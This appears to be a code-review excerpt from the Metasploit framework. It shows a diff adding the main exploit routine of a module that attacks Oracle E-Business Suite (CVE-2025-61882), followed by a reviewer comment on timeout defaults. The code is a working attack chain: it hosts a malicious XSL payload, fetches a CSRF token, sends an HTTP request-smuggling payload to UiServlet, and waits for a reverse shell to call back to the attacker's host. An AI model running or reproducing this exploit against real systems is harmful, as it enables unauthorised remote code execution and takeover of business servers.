modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb

```diff
@@ -0,0 +1,420 @@
+  end
+
+  def exploit
+    @xsl_served = false
+    @session_created = false
+
+    # Step 1 : Start HTTP server for XSL file serving
+    print_status("Starting HTTP server on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    start_service(
+      'Uri' => {
+        'Proc' => proc { |cli, request| on_request_uri(cli, request) },
+        'Path' => '/'
+      }
+    )
+
+    # construct server URL
+    server_url = get_uri
+    xsl_url = "#{server_url}#{Rex::Text.rand_text_alpha(8)}.xsl"
+    print_status("XSL payload will be served at: #{xsl_url}")
+
+    # Step 2: Get CSRF token
+    print_status("Retrieving CSRF token from target...")
+    csrf_token = retrieve_csrf_token
+
+    unless csrf_token
+      fail_with(Failure::Unknown, 'Could not retrieve CSRF token')
+    end
+
+    print_good("CSRF token retrieved: #{csrf_token[0..20]}...")
+
+    # Step 3: Smuggle payload
+    print_status("Creating HTTP request smuggling payload...")
+    smuggle_payload = create_smuggle_payload(xsl_url)
+
+    vprint_status("Smuggled payload created (#{smuggle_payload.length} bytes)")
+
+    # Step 4: Send exploit request
+    print_status("Triggering exploitation via UiServlet...")
+    send_exploit_request(smuggle_payload)
+
+    # Step 5: Wait for XSLT file download
+    print_status("Keeping HTTP server alive, waiting for callback to #{datastore['LHOST']}:#{datastore['LPORT']}...")
+    print_status("(Press Ctrl-C to stop)")
+
+    # Wait < HTTP_TIMEOUT seconds for XSL download
+    timeout = datastore['HTTP_TIMEOUT']
+    waited = 0
+
+    while waited < timeout
+      if @xsl_served
+        #vprint_good("XSL payload successfully delivered!")
+
+        # Wait for shell connection
+        shell_timeout = datastore['SHELL_TIMEOUT']
+        print_status("Waiting up to #{shell_timeout} seconds for reverse shell connection...")
+
+        shell_waited = 0
+        while shell_waited < shell_timeout
+          # Check session creation
+          if framework.sessions.length > 0
+            print_good("Session created successfully!")
+            @session_created = true
+            break
+          end
+
+          sleep(1)
+          shell_waited += 1
+
+          if shell_waited % 5 == 0
+            vprint_status("Waiting for shell... (#{shell_waited}/#{shell_timeout}s)")
+          end
+        end
+
+        break
+      end
+
+      sleep(1)
+      waited += 1
+
+      # Activity feedback
+      if waited % 5 == 0
+        vprint_status("Waiting for XSL request... (#{waited}/#{timeout}s)")
+      end
+    end
+
+    unless @xsl_served
+      print_error("Timeout waiting for target to fetch XSL payload")
+    end
+
+    unless @session_created
+      if @xsl_served
+        print_error("XSL was delivered but no session was created")
+      end
+    end
+
+    # Keep server active just in case
+    if @xsl_served && !@session_created
+      print_status("Keeping server alive for 10 more seconds in case of delay...")
+      sleep(10)
+    end
```

Comment:
I don't think this is a good idea, just use a higher/better timeout default value.